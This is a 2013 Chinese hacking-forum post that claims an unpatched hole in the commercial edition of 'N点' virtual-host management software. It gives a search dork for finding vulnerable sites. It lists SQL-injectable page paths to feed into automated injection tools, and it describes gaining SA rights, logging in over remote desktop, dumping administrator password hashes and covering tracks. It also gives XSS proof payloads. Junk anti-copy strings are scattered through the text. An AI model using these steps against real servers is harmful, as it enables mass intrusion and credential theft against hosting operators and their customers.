中国网络渗透测试联盟
标题:
N点商业版漏洞通杀0day以及利用方法
[打印本页]
作者:
admin
时间:
2013-3-3 08:06
标题:
N点商业版漏洞通杀0day以及利用方法
不得不说N点实在是一个破东西
3 o5 j' d( c: w
就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂
( ^5 e, y* n5 l4 z
好吧 抱怨一下就行了 接下来关键的时候到了
1 G: T( W" \' @: i9 S. e5 C1 [
首先百度搜索关键字:inurl: (mmdatabase.asp)
* ?* a, V6 n Y C# g1 f5 o) }
我随便列举一个:
www.xxxx.com
/ W* ?$ m7 ]# b" b! A" A1 R
修改链接:
http://www.xxxx.com:80/Style/new ... &RID=1&ID=1
! r4 c3 }+ ]% N
扔入NBSI 或者啊D等各种傻逼工具后
2 W. O. x6 u6 R, w6 ^% J5 N' S
你们会看到是SA权限
9 l: u C- e9 O0 ]9 |: n
果断3389 上去 hash得到administrator密码
( S1 J6 C- |- v a0 V
擦屁股走人~
$ j. ~1 P; p g
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
/ J. c, B% z" R. h
1 r# x9 e o8 B, F
再附上其他几个漏洞页面
" J' b; u1 ]' n4 \8 n2 B
SQL:
9 V; j3 i; q# v6 @- |* ^, `( s
http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1
$ O4 p5 U8 z) r# X# C9 u9 [
http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11
& v# L) I& x' t/ P3 f4 l8 e' h
http://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9
4 {9 A% P" J' h0 G! L
http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2
d6 P; {' z/ _# Z# H# h
XSS证明:
! h/ [* U# }7 d4 F+ S3 t
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp
”;alert(42873);”
, {; U+ T, c( g5 r
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp
”;alert(42873);”
7 v3 }' e n( M! y
http://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn
<script>alert(42873)</script>
. r, {/ V @3 r, ^ w
由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜
- |( v4 O' S W3 h. }
还是星外吧 你们懂的
! k$ [0 v" I6 L& L( ], }( e+ O
作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?
8 ?/ _) u. {. n; w# I g
PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉
3 V5 I P: R3 z" r9 t
——-
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2